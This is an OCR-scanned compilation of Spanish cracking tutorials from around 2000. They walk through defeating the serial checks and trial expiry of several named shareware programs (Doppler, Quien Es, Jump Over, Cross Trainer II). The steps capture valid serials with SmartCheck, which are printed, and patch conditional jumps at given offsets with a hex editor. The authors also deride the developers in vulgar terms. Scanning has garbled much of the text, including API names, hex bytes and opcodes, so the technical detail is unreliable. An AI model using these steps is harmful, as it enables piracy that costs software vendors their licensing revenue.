funcion __ VbaStrCmp, _ VbaStrComp o introduciendo en la casilla de busqueda el S/N falso las 
dos opciones son utiles la primera es la funcion utilizada generalmente por Visual Basic 
para comparar los datos que hemos metido con los correctos y la segunda nos situa donde se 
encuentra el S/N que hemos metido y luego rastreando es facil encontrar el S/N correcto, en 
este caso utilizo la primera opcion osea que metemos en la casilla de busqueda vbastrcmp y 
pulsamos Enter 


2 veces, en este caso el S/N aparecio enseguida 


$  HeapSize[HANDLE:00440000, FLAGS:00000000, PTF 4] [DOPPLER EXE/0O0188D4 (no debug info] 


$  SysFieeSting El- unsigned short * string] = 00445740 
$ — _ vbaFreeStr retums DWORD:20 od ="2E92F40" 
> —vbaStiMove(String:"2E92F40", LPBSTR:0066F5B8) returr E unsigned short * string2 = 00540744 
+ —vbaStimplSting'"2E92F40", Sting."8493")retums DWO o "99" 
$  _ vbaFreeStiList[) 


$  —SysFreeString[BSTR:00447D48] 
% —HeapSize[(HANDLE:00440000, FLAGS:00000000, PTF 


Sencillo no?? Vemos como se paro en la funcion __ vbaStrCmp y hay estan nuestros numeros 
Nuestro S/N : 8493 
S/N Correcto: 2E92F40 


Pero ... SORPRESA!! Realmente este numero no me sirve ni a mi, por que si os fijais este 
programa genera un numero cada vez que lo ejecutamos e intentamos registrarnos, este numero 
lo podemos ver en la parte superior de la ventana de registro, y dependiendo de este numero 
genera el S/N valido pero solo para esa ejecucion, osea que si no introduces el S/N que has 
capturado en la misma ejecucion no te sirve de nada. 


Asi que hay que repetir otra vez el proceso y sin cerrar el programa introducimos el serial 
Capturado jejeje, o podemos pensar en otra forma de crackear el programa, esta vez haciendo 
un parcheo para que simule estar registrados (personalmente me gusta mas lo del parcheo que 
localizar el S/N) 


PARTE 2 


Bueno lo primero hacer una copia del ejecutable doppler.exe con el nombre por ejemplo 
doppler2.exe, desensamblamos doppler.exe con el W32dasm VB (el que muestra las String Ref. 
en Prog. visual basic) si no lo teneis lo podeis descarar de mi pagina 
http://welcome.to/karpoff en la seccion herramientas, seguimos.. con el editor Hex editamos 
doppler2.exe y adelantamos la fecha de Windows 1 mes para trabajar con el programa expirado. 


Ejecutamos el programa para ver que hace cuando esta Caducado, vemos que nos muestra un 
aviso diciendo que el programa ha expirado nos da la opcion de rellenar el registro si 
fallamos el programa no llega a ejecutarse. 


ATAKI 


e 


Podemos localizar la rutina que se encarga de comprobar el S/N y manipularla o tambien 
podemos localizar la rutina que decide si el programa esta caducado o no y modificarla en 
beneficio nuestro, cual cogemos yo opto por la segunda, creo que la primera opcion es la que 
suelo mostrar en otros manuales asi que vamos a impedir que el programa Caduque. La teoria: 
a partir del mensaje de error analizaremos el codigo y veremos donde y como toma la decision 
de que el programa no se ejecute por estar caducado, localizado esto pasaremos a modificar 
el codigo. 


Estamos en el W32dasmVB con el programa desensamblado, pulsamos la boton de las Strg-Ref. y 
buscamos entre las cadenas de texto el mensaje de expiracion: 


"Your 21-day trial period has expired. " 
Hacemos doble clip y nos lleva directamente a: 
" 


* Possible StringData Ref from Code Obj ->"Your 21-day trial period has expired. 


00424E75 C78570FFFFFF18D04000 mov dword ptr [ebp+FFFFFF70], 0040D018 -AQUI 


Bueno analicemos el codigo para ver que coño pasa por que cuando pasan los 21 dias ya no 
funciona el programa. 


* Reference To: MSVBVM50.__vbaFreeStr, Ord:0000h 


:00424E1E FF1554E54200 Call dword ptr [0042E554] 
:00424E24 6685F6 test si, si 
:00424E27 0F843D010000 je 00424F6A - el responsable 


* Reference To: MSVBVM50.__vbaVarDup, Ord:0000h 


:00424E2D 8B35E4E44200 mov esi, dword ptr [0042E4E4] 
:00424E33 B804000280 mov eax, 80020004 

:00424E38 BBO0A000000 mov ebx, 0000000A 

:00424E3D BF08000000 mov edi, 00000008 

:00424E42 8D9558FFEFEF lea edx, dword ptr [ebp+FEEFFFFS8] 
:00424E48 8D4D98 lea ecx, dword ptr [ebp-68] 
:00424E4B 894580 mov dword ptr [ebp-80], eax 
:00424E4E 899D78FFFFEF mov dword ptr [ebp+FFFFFF78], ebx 
:00424E54 894590 mov dword ptr [ebp-70], eax 
:00424E57 895D88 mov dword ptr [ebp-78], ebx 


* Possible StringData Ref from Code Ob3] ->"Sorry!" 


:00424E5A C78560FFFFFFB4BA4000 mov dword ptr [ebp+FFFFFF60], 0040BAB4 

:00424E64 89BD58FFEFEF mov dword ptr [ebp+FFFFFF58], edi 

:00424E6A FEFD6 Call esi 

:00424E6C 8D9568FFFFEF lea edx, dword ptr [ebp+FFFFEFF68] 

:00424E72 8D4DA8 lea ecx, dword ptr [ebp-58] 

Bueno esta bien sencillo no ?? Tenemos un bonito salto condicional en la direccion 00424E27 
je 00424F6A que hace esto?? Bueno mientras estamos dentro del periodo de evaluacion el salto 


condicional se ejecuta llevándonos a 00424F6A evitando asi el temible aviso de expiracion, 
pero cuando han pasado los 21 dias este salto es como si no estaria y al no ejecutarse 
BooM!! Pantallazo y fuera del programa, pues ya sabemos que tenemos que hacer lo vamos a 
convertir en un salto incondicional, que se ejecute siempre asi nunca nos mostrara el Your 


21-day tal tal... haber tenemos 


00424E27 0F843D010000 Je 00424F6A y queremos 


00424E27 jmp 00424F6A 


Como calculamos el valor en Hexa para que el salto nos lleve justo a la direccion de memoria 
que queremos 00424F6A Bueno con el propio W32dasm podemos hacerlo solo tenemos que pulsar 
CTRL+L para activar el debugger y hacer el parcheo en memoria, bueno pues eso pulsamos 
CTRL+L se abre la ventana de comandos y pulsamos load enseguida empieza el proceso de 
ejecucion y se abren numerosas ventanas pulsamos la opcion Goto Address y metemos la 
direccion de memoria del salto ouseaseeee 00424E27 aceptamos y el debugger nos situa justo 
en esa direccion ahora pulsamos Patch code y se abre una nueva ventana pues solo tenemos que 
meter los cambios que queremos hacer tecleamos 


jmp 00424F6A y pulsamos Enter 


Enseguida vereis justo debajo como se ha generado la el valor que necesitamos para cambiar 
el salto. 


00424E27 E93E10000 JMP 00424F6A 


Ahora solo nos queda llevar a cabo los cambios localizamos la direccion del offset que la 
vemos en la barra inferior del W32dasm 24227 y vamos al Editor Hex 


Donde cambiamos 


0F843D010000 por E93E1000000 


y ya esta probamos a ejecutar doppler2.exe y olee!! El programa funciona, hacemos algunas 
pruebas para asegurarnos de que el parcheo no afecte a otras funciones del programa. 


Y todo esta en orden, pero podemos ser un poco mas elegantes si os fijais cuando arranca el 
programa vemos en el nag de presentacion you have 0 dais tal tal podemos cambiar eso por lo 
que pondria si estariamos registrados, ale pues hacemos lo mismo que antes localizar la 
rutina responsable de que se imprima la frase, buscamos you have en las string ref. y 
cliqueamos sobre la frase. 


Y aquí tenemos toda la movidilla 


:00424C2B FFD3 call ebx 
:00424C2D 6685F6 test si, si 
:00424C30 7410 je 00424C42 —Nuestro amigo 


* Possible StringData Ref from Code Obj ->"written by Gary Calpo" 


:00424C32 BABCCE4000 mov edx, 0040CEBC 


:00424C37 8D4DD8 lea ecx, dword ptr [ebp-28] 


* Reference To: MSVBVM50.__vbaStrCopy, Ord:0000h 


:00424C3A FF15B4E44200 Call dword ptr [0042E4B4] 


:00424C40 EB4A jmp 00424C8C -- Importante 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00424C30(C) 


Possible StringData Ref from Code Obj ->"You have " 


:00424C42 68ECCE4000 push 0040CEEC 
:00424C47 E8542C0000 call 004278A0 
:00424C4C 50 push eax 


Haber resumiendo!! tenemos un salto condicional en 00424C30 que si se ejecuta nos muestra 
los dias de evaluacion mediante el You have y otro aviso similar que hay debajo de ese, 
bueno pues hagamos que no se ejecute el salto, y nunca llegara a You have, ya que antes de 
llegar se encuentra con un salto incondicional en 00424C40 que nos saca volando, evitando 
que se impriman los avisos, osea que tenemos que inutilizar el salto condicional de 
00424C30. cambiamos 


00424C30 7410 je 00424C42 Por 


00424C30 90 nop 


00424C31 90 nop 


localizamos la direccion de offset de nuestro salto 24030 y vamos al editor HEX cambiamos 


7410 por 9090 


Asunto solucionado, pero todavía se puede mejorar este crack evitando que se impriman avisos 
similares como en el about, pero eso lo dejo como deberes del manual. 


Nada mas espero que os sirva de ayuda a todos los que empezais a crackear. 


Y acordaros de restaurar la fecha de vuestro Windows. 


Pues esto es todo. Que os a parecido.. interesante no¿? Como siempre mi mayor deseo es que 
entedais esto como yo intento explicarlo. 


Un saludo para todos/as (karpoff) 


como siempre cualquier duda podeis contar con migo. 


Este material es solo para uso educativo, por ahora los cracks son ilegales. 


Email Kf karpofffthotmail.com 


URL: http://welcome.to/karpoff http://karpoff.tsx.org http://karpoff.welcome.to 


Karpoff Spanish Tutor: Pagina dedicada a la dibulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Programa: Quien Es v1.0.128S 


Karpoff Spanish Tutor 


Time Trial. Hay que registrar con un serial la versión Standard, sin introducir nombre. A 


A los 30 días se transforma en versión Lite sino lo registras. 

Descripcion: 'Indentificador de llamadas entrantes 
Dificultad: PA 
DOWNLOAD : o 

Herramientas: RA 
CRACKER: 


| Leirus | FECHA: 


| 08/08/2000 


INTRODUCCION 


Stándard, 


Dejémonos 


Toma de Contacto con El Programa: 


Antes de empezar, deberemos como siempre recabar un poco de información a fin de 
saber exactamente lo que tenemos que hacer. En primer lugar ejecutamos el programa, y 
comprobamos que nos deja ejecutarlo en versión durante 30 días, después de lo cual 
nos lo deja en versión Lite, con algunas funciones desactivadas. Según el autor, para 
ambas versiones hay que registrar el programa. Nosotros lo haremos para la versión 


totalmente funcional. Todo esto se consigue introduciendo un serial. 


En realidad, no entiendo que quiere decir el programador con registrar las dos 
versiones, 
inútiles aplicaciones cuando se les aplica la premisa de "comercial". 


pero en fin, estos estúpidos e ineptos "creadores" hacen de sus bichitos 


de Zarandajas y vayamos a por el Serial, que es lo que nos interesa. 


AL ATAKE 


DISCLAIMER: Previamente, quisiera decir que este tutorial ha sido escrito con fines 
educativos y científicos, y que cualquier uso inapropiado del material del mismo puede 
sufrir la pérdida de datos inintencionadamente. Asi mismo, declino toda responsabilidad del 
uso personal que los lectores de este tutorial puedan hacer con la información que a 


continuación les detallo 


Un poco mas de Informacion para Asegurarnos: 


Ahora que ya sabemos lo que hace, deberíamos conocer en que lenguaje ha sido escrito o si ha 
sido comprimido. Lo analizamos con el FileScanner y nos dice que está compilado en Visual 
Basic. Pues bien, esta vez no vamos a utilizar el SoftICE, sino otra utilidad menos versátil 


pero mucho más eficiente que el SiCE para programas Visual Basic, el SmartCheck, también de 
nuestros amigos los de NuMega. 


Algo sobre SmartCheck: 


No hay nada más fácil de crackear que un programa hecho en Visual Basic sin la protección 
adecuada, siempre y cuando utilicemos SmartCheck. 


En términos coloquiales podemos decir que SmartCheck es un "Reportador de Eventos de Visual 
Basic", incluyendo llamadas a la pila, a la API, etc. Además permite los argumentos que son 
pasados a las funciones llamadas, así como los valores que éstas devuelven, pudiendo así 
visualizar con mayor facilidad los serial's que introducimos. 


Para "Reportar" los eventos debidamente y en base a nuestro propósito principal, deberemos 
tener configurado el SmartCheck de una manera concreta: 


1- Debemos ver todos los eventos que ocurren: Pulsa sobre el menú View y activa "Show all 
events". 


2- Debemos ver los argumentos: Pulsa sobre el menú View y activa "Arguments", "Sequence 
Numbers" y "Suppressed Errors". Con esto veremos los argumentos pasados a funciones (nuestro 
serial inválido o parapléjico según se mire, ;*) ), las secuencias de números y los errores 
que hemos ignorado. 


3- En Program -> Settings, activa todas las casillas. Pulsa el botón Advanced y activa todas 


las casillas menos "Suppress system API and OLE calls". Acepta y en Reporting, activa todo 
menos "Report MouseMove events from OCX controls". 


rr E . 


3d 7 


Ahora que está configurado correctamente el SmartCheck, es hora de lanzar nuestro programita 
con él, para ello nos vamos a File -> Open. Le damos al botoncito con un dibujo como si de 


un Play se tratara y a correr el puto diablo. 


El Smartcheck, Recopilando Toneladas de basura 


Durante el proceso de Reporte, es muy probable que nos salgan ventanitas diciendo que se ha 
encontrado un error en la ejecución del programa. Sin embargo, no es así, O al menos, no 
afecta directamente a la ejecución del programa. Lo que haremos siempre en este caso será 
pulsar el botón "Acknowledge", o algo así como certificar, testificar, vamos, decirle al 
programilla que te has enterado que ha habido un error. 


Una vez cargado el programa, lo que deberemos hacer será intentar registrar el programa, 
introduciendo un serial cualquiera, por ejemplo "147258369" (si miras el número y el teclado 
numérico, comprobarás porque uso este número). Nos da error el programa y nos dice "LA llave 
es incorrecta, por favor, si paga no se cuanto dinero, le meteré el pene por el trasero y le 
quitaré su Visa ORO". Desde luego me dan asco estos programadores de mierda. Después de 
cabrearte y dar un puñetazo en la mesa, salimos del programas y el SmartCheck dejará, tarde 
o temprano de reportar los eventos. Es posible que tras esta operación, en la esquina 
inferior derecha, en la barra de estado, se hayan reportado más de 50.000 eventos. Esto es 
normal, teniendo en cuenta que el visual basic es un lenguaje de programación bastante 
porquería y que deja un rastro de babas enorme. No es de extrañar que te encuentres con 
programas más o menos gorditos que te reporten en el SmartCheck 300.000 eventos, pudiendo 
morirte de pena. 


En realidad ahora viene lo bueno, buscar nuestro serial de entre toda esa porquería, y 
buscar el momento exacto en el que se compara con el serial verdadero que ha generado la 
mierda de programa 


Buscar un serial que no sea Invalido. 


Para todo esto y mucho más, está la casilla de búsqueda del fabuloso SmartCheck. 
Introducimos ahí los primeros números que introducimos anteriormente, es decir "147258". 
Atención, es absolutamente necesario que NO busques tu serial entero, porque es posible que 
SmartCheck no lo encuentre. Con que introduzcamos los 6 primeros números es suficiente. Tras 
pulsar sobre los 


fieras 


_ vbaFreev ari WARIANT:String:"8012-843...*"] retums DW'DRAD:20 
— vbaStiMove(String:"FORD-QYC...", LPBSTR:D0087F578) retums DWORD:652 


QUIENES. .EXEl0D234664 (tio debug info 
=l- unsigned short * string] = O06564E0 


String: "FORO-QYE... retums DYWODRD:1 


vid: : =""147258369" 
$  _ vbaFreeStiList() retums DWORD:20 E únsigned short * string2 = ODE52044 
$ — _ vbaFreeDbiListiunsioned int:00000002) ="FORO-DYCW" 


Ñaca, Ñaca, nos encontramos con una llamada a __vbaStrCmp, pasándole los parámetros 
"147258369" y "FORO-QYCW" y devolviendo 1. Creo que es bastante explícito las 2 líneas de 
arriba. Ya tenemos nuestro serial cogido por los huevos. Ahora sólo queda anotarlo y 
escribirlo posteriormente en la casilla correspondiente para registrar el programa. 


Para los más avanzados, si estudiáis la parte de código que os ofrece el SmartCheck un poco 
más arriba a lo mejor incluso conseguís hacer un KeyGen. Y esto es todo. 


Consideraciones Finales. 


Como he comentado antes, y también durante todo el tutorial, el SmartCheck nos permitirá 
depurar los programas en Visual Basic. Sin embargo, parecer ser que cuando el programa ha 
sido p-compilado (algo que se puede hacer a partir de la versión 5.0 de VB), no es Capaz de 
reportar todos los eventos, de hecho ninguno. En algo tenía que fallar. 


No obstante, a pesar de este contratiempo, existen en la red numerosas aplicaciones, 
plugins, complementos o librerías que añaden mayor versatilidad al SmartCheck. Por ejemplo, 
capacidad para depurar otros lenguajes como Pascal, C, etc. 


AGRADECIMIENTOS: 


Siendo preceptivo, he de agradecer en todo momento a todos los miembros de [K-FoR], un grupo 
de cracking realmente atractivo, del que formo parte y soy miembro fundador. He de dar 
gracias a todos los cracker's (mejor dicho ingeniería inversa.) que me habéis ayudado a 
entrar en este mundo, incluso sin saberlo. Gracias a todas las personas que hacen de este 


mundo un mundo más perspicaz. 
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Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 


Programa: Jump Over 1.0.192 


PROTECCION: Serial, Limitación de funcionamiento. 


Descripcion: 


Dificultad: Facilucha gracias a smart check 
DOWNLOAD : http://www.abc-ware.de co  http://ww.download.com 


Herramientas: 


CRACKER: Yerba Mate FECHA: 31/08/2000 


| INTRODUCCION 


Me decidió a escribir este tutorial el hecho de que en la página de Karpoff (del cual soy un asiduo lector, 
em mejor dicho alumno) había solo un proyecto con smartcheck. Pensé que algún newbie pensaría que esta 
herramienta sería de escasa utilidad o de uso complicado, pues ninguno de los dos, Smartcheck es de los 
mismos creadores del Soft-Ice y para muchos programas realizados en VB te facilitará las cosas. 


Juego de ingenio 


Smartcheck 


Jump over es un juego que me trajo recuerdos de la niñez. Eran tiempos en que los ordenadores no estaban 


tan difundidos y para pensar un poco teníamos que recurrir a cosas así ;-) Cuando lo 
instales el programador te dejará usar solamente una pantalla de todas las que trae. No te preocupes lo 
solucionaremos. 


AL ATAKE 


Este programa llegó a mis manos a travez de un CD de una revista, como una versión shareware. Lo instalé, lo corrí, 
me invitó a registrarlo. Hacía frío y llovía. Sin pensarlo dos veces puse mis datos, control-D, 

bpxhmemcpy (como no lo había analizado en lo más mínimo,bpxhmemcpy, entraría en algún lugar del programa y a 
buscar el serial) ,F5, aceptar y el Soft-Ice entró en el programa. FS dos veces para que lea las ventanas con los datos 
y de ahí en mas F12 para llegar a la parte del programa que comprueba el número de serie. Después de unas cuantas 
F12's leo en el Soft-Ice ( línea verde inferior) MSVBVM60!text.............. Mmmmm......... está hecho en VB. Al 


NOTA: es obligatorio leer el tutorial de KARPOFF referente al Smartcheck, a los fines de comprender su manejo y 
como setearlo correctamente. 


Ahora si, a lo nuestro. Iniciamos el Smartcheck, abrimos Jumpover, vamos a 'program' , ' start' y el programa 


empieza a correr. Se detiene en esta ventana: 


Software for Kids 
JumpOver 1.0.192 


unregistered 
Shareware Yersion 


http://www abc-ware.de/ E] 
SAWE progam number 4BC_113 pra 


Formore information see readme. htm! 
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Clickeamos en 'Enter registration code' e introducimos nuestros datos. Jugate poné los tuyos que te va a funcionar. 
En mi caso los completé de esta forma : 


Name: [yerba 
City [mate "| 
Code [12345678 


Le damos al botón de 'OK' y el smartcheck sigue su curso hasta obtener el mensaje de error. 


*-NuMega SmartCheck - JumpOwer.exo - Program Results] 


| File Edit View Prodism Window — Helb - 15] xj 


Invalid. argument 
API failure: Add 
Invalid. argument 
API failure: Addé 
API failure: Comp 
API failure: CoCr 
DriErrorilong: 1] 
_Load 

DoE vents[] 

DoE vents(] 
Invalid argument 
API failure: GetO 
API failure: Delet 
Invalid. argument 


ze 


E E 


ADIIMKIX € £ DE XIII KK 


No source file 


| For Help, press Fl [RUN [Pragram Events: 7082 


Aceptamos , pulsamos 'OK' en la pantalla del Jumpover y el programa se terminará de cargar, salimos del mismo con 
el botón de stop (al lado de play). Ahora solamente estamos en el Smartcheck. En la ventana de búsqueda escribimos 
"12345678" y presionamos 'find' como se vea continuación 


la] BS] El [12345678 +] Ñ Fra 22] SE 
= 8- Thread 0 [thread id:4293224865 (OxFFES69A1 - 
MU 


(No details] 


Invalid argument: £ddátomw', argument 1, LPWSTA: Ox00000000; Y 
API failure: Addátomw' retumed OxD0000000, LastError: Esta tunción 
Invalid argument: £ddátomw', argument 1, LFW'STA: Ox00000000; 7 
API failure: Addátomw' retumed OxD0000000, LastError: Esta tunción 
API failure: CompareStungw! retumed Ox0DO00000. LastError: Esta tur 
API failure: CoCreatelnstanceEx retumed Ox80070057. LastEror: El p 
OnErrorllong:1] 

_Load 

DoE vente!) 

DoEvents[] 

Invalid argument; lswindowWisible, argument 1. HWND: OXODOD0D00 
API failure: GetObjectá, retumned Ox00000000. LastError El parámetro 
API failure: DeleteO bject retumed OxD0000000 

Invalid argument: Addátomw?, argument 1. LPW'STR: Ox00000000; T 
API failure: Addátomw* retumed OxD0000000, LastError Esta tunción 
ES  _Load 

ES  _Click 


EY _Activate há 
41 » 


No source file 


EII LE DEMNIIIIN 


MAAAÁÓ 


Volvemos a apretar 'find' y debajo del segundo '12345678' sorpendentemente y con un mínimo esfuerzo vemos en la 


4 3881 23)01 515] Ja 
AightsiSting: "40537450", long:£] El- unsianed short ** .pbstrval = DOBFE3 


pantalla el número de serie buscado. En mi caso es ' 537450-2B9-324 ' 
$% InStillong:1; Stung:'"'yerba", String:" *, Integer:D] retums LONG: JUMPOVER.EXEIDOO9ADBB [no debug info) 
$% Instiílong:1; Sting: "mate", String:"* *, Integer:0) retums LONG:C El ¿ting (vaiéni : 
$ 
$ Right$[Stimg:"9282B9", lona:3] E String = ODADOEDO 
9% SiSIVARIA4NT:Long:0] . ="537450-2B9-324" 


2 Sting[''0'")]-> Double [0] 
2. Double (0) -> Long (0) 
2, Double (324) -> String ["324"'] 
$% TimtiSting:'324"] 
$% TimivARIANT:ByRel String:'12345678"') 

||. 5: Trimi'ARIANT:ByRet Sting:"537450-2..."] 
$% MsgBox[VARIANT:Stnna:'Invalid ...'" Integer:48. VARIANT:Stn 
$% SaveSettina/Sting:'JumpOwer"'. Sting: Registr... Sting:'"Nan 
$% SaveSettinaí Sting: JumpOwer"' Sting: Registr... Sting:"Ort'' 
$% SaveSettingíSting:'JumpOwer!"! Sting:"Registr...*', Stang: Ken 


¿£  _Unload 
B  _Click 
g£  _Click 
EY  _Activate 
MX API tailure: FreeLibrary retumed Ox000Ó0000D ¿e 
4 la » 


No source file 


Para terminar unas pocas cosas más. Si hubiéramos seguido traceando con el Soft-ice se hubiese arribado al mismo 
final, la diferencia radica en el tiempo empleado y en la complejidad del análisis. Pero no te confundas para ser un 
cracker de verdad tendremos que aprender a dominar estas dos y muchas otras herramientas mas. Tarea para el 
hogar ;-) en la misma dirección web (www.abc-ware.de ) podrás bajarte otro programa llamado Matris versión 
1.22.339 y con la misma técnica que en este tutorial deberás ser capaz de registrarlo. Tranquilo que vas a poder. 


Por dudas o comentarios comunicate a yerbamatear O yahoo.com 


Espero que este tutorial te halla sido útil. Nos vemos en el próximo 
Yerba Mate 


" Todo es fácil cuando se sabe como ' 


Karpoff Spanish Tutor: Pagina dedicada a la dibulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 


Programa: Cross Trainer II 


PROTECCION: número de serie 


Descripcion: | Programa Dieterico 
Dificultad: Principiante 


DOWNLOAD : 


http://www.innovativelogic.com/crosstrainer/index.htm 


Herramientas: SmartCheck 6.03 


CRACKER: Raviel | FECHA: 07/09/2000 


INTRODUCCION 


Hola a todos, Soy RAZi¡EL del Grupo K-FoR, y este es mi primer tutorial... Sólo espero que al menos se 
entienda lo que digo, y que os sirva para aprender algo más sobre la mentalidad comercial de muchos 
programadores. 


1.- Saludos: 


Ten en cuenta que este tutorial está realizado únicamente con fines educativos, y que no puedo hacerme 
responsable del mal uso que se pueda hacer de la información aquí expuesta. Si te gusta el programa 
COMPRALO 


AL ATAKE 


2.- Conociendo a la Víctima: 


Cross Trainer II de Innovative Logic Corp, es un programa destinado al mantenimiento del cuerpo, así, 
introduciendo tu edad, peso, altura... se encarga de hacer un estudio completo de tu integridad física, tu entrenamiento 
aeróbico, dieta a seguir para mantenerte en buena forma... 


En primer lugar, ejecutamos el programa; y Voila, nos aparece una ventana como esta: 


Athlete Sign In 


155 Crossirainer 


achieve your maximum potential 


Copyright 1997-2000 


Registered to: Unregistered Wersion: 4.5.1 


Athlete Name | há ] 


Copyright 1997-2000 Innovative Logic Corp. All Rights Reserved. 


Encima de Athlete Name pone: “Registered To: Unregistered”, pero que raro, nada, de regístrate ni paranoias 
similares, este programa empieza a gustarme (no te enseña ventanas con el clásico “REGISTRA; REGISTRA”) así, 
que con toda nuestra buena intención pulsamos en New, para crear un perfil a nuestra medida, pero al pulsarlo... ¡Que 
Sorpresa! Una ventana de registro, ya decía yo, que los programas hechos por amor al prójimo, no abundaban... 
Como podéis ver, la ventana posee dos cajas de texto, una que dice Nombre de Usuario o Compañía y otra con 
Registration Number (que nos dan si clavan los dientes en nuestra pobre tarjeta de crédito), y en la esquina inferior 
izquierda tres botones, el primero que nos hace ver que aún lo estamos probando (TRIAL PERIOD), el siguiente 
botón, el que nos interesa, para validar nuestro Nombre y Serial (REGISTER NOW), y el tercero (EXI), por si no 
aceptamos las condiciones de uso y decidimos abandonar el programa. 


3.- Análisis Detallado del Programa: 
Introducimos nuestro Nombre, y un Serial cualquiera, Ejemplo: 


- User/Company Name: RAZiEL 
- Registration Number: 1234567890 


Y nos encontraremos con una ventana de información, que nos dice muy amablemente: “Invalid Registration 
Number”. 

Entonces, como Cracker poseso nos lanzamos a destripar el código del programa, para obtener nuestro Serial, y 
sentirnos a gusto con nosotros mismos, vamos a iniciar el W32Dasm, Ida, o SICE cuando de pronto... ¿No se nos 
olvida algo?. 


Exacto!, ¿Qué ocurre si el programa está empaquetado con Aspack, Armadillo, Shrinker o similares?... sin duda 
alguna que perderemos el tiempo... 


Así, que armados con nuestro Analizador de Archivos (Yo personalmente uso File Analizer o File Info 2.30), 
comprobamos que es un programa hecho con Visual Basic 


Comentario Sabroso: Los programas de Visual Basic se caracterizan por ocupar bastante espacio, tanto el ejecutable 
como los tropecientos archivos que se han de adjuntar para que la aplicación funcione correctamente y son lentos en 
ejecución. Además van acompañados de DLLs muy sospechosa con nombres VBx*.dll, (x) dependiendo de la versión, 
y similares, que te hacen sospechar un poco, ¿verdad? 


4.- Destripando Código: 


Si bien, según el lenguaje usado para la creación de la aplicación usamos un Depurador, Desensamblador... u otro, 
para aplicaciones de Visual Basic haremos uso de Smartcheck v6.03. Bien, todo listo, pulsamos Abrimos el programa; 
y lo ejecutamos pulsando el botón de Play. 


Comentario Sabroso: Si no tenéis correctamente configurado SmartCheck iros al menú; Program, Settings, Avanced, 
y activad todas las casillas excepto la de: Supress API And OLE calls. 
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También, para que nos muestre todos los eventos pulsad en Smartcheck la casilla: 


Cross Trainer Il, tiene numerosos errores al ejecutarlo, al menos en mi ordenador, así que si te sale una pantalla de 
error una y otra vez pulsa el botón de Acknowledge. 


Comentario Sabroso: Existen infinitos algoritmos para generar números de serie a partir de un nombre (tantos como 
creen los programadores), pero hemos de tener en cuenta, que en algún momento, para validar si el Serial es el válido o 
no, el programa ha de comparar el Serial introducido con el verdadero, ése es exactamente nuestro objetivo, buscar esa 
comparación, y: 


- a) modificarla a fin de que al meter cualquier serial introducido sea válido 
- b) extraer nuestro propio serial 


Esta segunda opción es mas elegante, puesto que si salen nuevas versiones, el programador, por vago, usará el 
mismo algoritmo, y sólo necesitaremos introducir nuestro serial, y en caso de hacer (a), tendremos que parchear las 
siguientes versiones también. 


En Visual Basic una forma de comparar muy usada es la llamada a la función: “vbAstrmemp” 


Bien, el algún momento nos dejarán de aparecer errores y dejarán de surgir eventos (si ves que tarda demasiado 
en salir, y nos es tu ordenador que es excesivamente lento, interactúa con el programa, clickeándolo, para hacer más 
rápida su ejecución, y evitar errores fatales), y saldrá la ventana del programa. 


Nosotros, buscamos que en Smartcheck nos aparezcan todos los eventos referidos al método de registro del 
programa hacemos igual que antes. 


Pulsamos New. 
Introducimos nuestro Nombre, y un Serial cualquiera. 


- User/Company Name: RAZi¡EL 
- Registration Number: 1234567890 


Pulsamos Aceptar, y lógicamente: “Invalid Registration Code”. Bien, entonces pulsamos EXIT, y salimos del 
programa, si salen mas errores aún, sigue pulsando Acknowledge, es que el programa esta muy mal hecho... 

Bien, dejamos que Smartcheck termine de mostrar eventos, y nos ponemos manos a la obra. Como buscamos una 
comparación, primero procederemos con El serial, es mas normal que genere y compare el serial según el nombre 
introducido que viceversa, pero hemos de tener en cuenta que por comodidad Smartcheck acorta las cadenas y las 
muestra seguidas de puntos suspensivos, así, en nuestro caso, introducimos, por ejemplo, únicamente las 8 primeras 
cifras. 


Ponemos en la caja de texto nuestro Serial cortado (En mi caso 12345678). Y se encenderá el botón de los 
prismáticos, dale y comenzará lo bueno... 


[12345678 +] El 


Smartcheck se pone manos a la obra y encuentra coincidencias tales como: 


2% LeníSting:"12345678...") retums LONG:10 


9% LeníString:"RAZiEL"] retums LONG:6 


Vemos que coge la longitud del Nombre y el Serial, seguimos buscando... mas coincidencias... y llegamos aquí: 


2 — vbaStCmpíSting"KXFOCPKO", Sting:"12345678..."] retums DWORD:FFFFFFFF 

%  —_ vbaFreeStiList(] returns DWDRD:1 

$  _ vbaFreeDbilistiunsigned int:00000002) 

$ vbaVaDup(YARIANT:Strina: "Message", VARIANT:Empty) retums DWORD:92E140 
$ 

9% 


+ 


[+] 


E 


_—vbaYaDup(VARIANT:String:"Inwalid ...", VARIANT:Empty) retums DWODRD:32E1B0 
MsgBox(VARIANT:String:"Invalid ...”, Integer:64, VARIANT: String: "Message", VARIANT: 


+ 


OH!!! Observad, ¡QUE CURIOSO!: 


- Se comparan Dos Cadenas: KXFOCPKO y 12345678... (1234567890) 

- Devuelve 1, puesto que no son iguales 

- Entonces Se crea una MessageBox que nos muestra la famosa cadena de texto: Invalid... (Invalid 
Registration Number). 


Podeís Hacer un KeyGen estudiando detenidamente el código, y comprobaréis, que el número que aparece en el 
último lugar del Serial correcto, coincide con el último del erróneo, y si lo modificas seguirá siendo válido el Serial. 


Bueno, creo que llegados a este punto las palabras sobran, simplemente ejecutad Cross Trainer II, y poned nuestros 
datos correctos, Así de sencillo. 


5.- Agradecimientos: 

Me gustaría dar las gracias a todos los Crackers que escriben sus Tutoriales en Castellano, así como a los 
traductores, que hacen día a día el mundo del Cracking mas llevadero, sin fronteras lingiísticas, y especialmente 
agradecer a los otros miembros del grupo K-FoR, el apoyo moral y las críticas constructivas, y por supuesto al 


Profesor X, por hacer la recopilación famosa de Tutoriales exclusivamente en Castellano. 


Un abrazo a todos los Crackers. De RAZi¡EL 


Porque somos muchos... 


sobre 
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Dr.Salman Disk Space Recovery Wizard 
ver.2.75 


Programa: 


PROTECCION: Serial 

Descripcion: Mantenimiento de HD 
Dificultad: Principiante 
DOWNLOAD : 22? 

Herramientas: SmartCheck v6.03 


INTRODUCCION | 


Es una utilidad para quitar a basura del disco duro, hay muchas pero debemos comprobar la eficacia de este 
programa, para ello ser versión no registrada no nos ayuda para nada. Vamos a registrarlo usando el 


Smartcheck de Numega. 


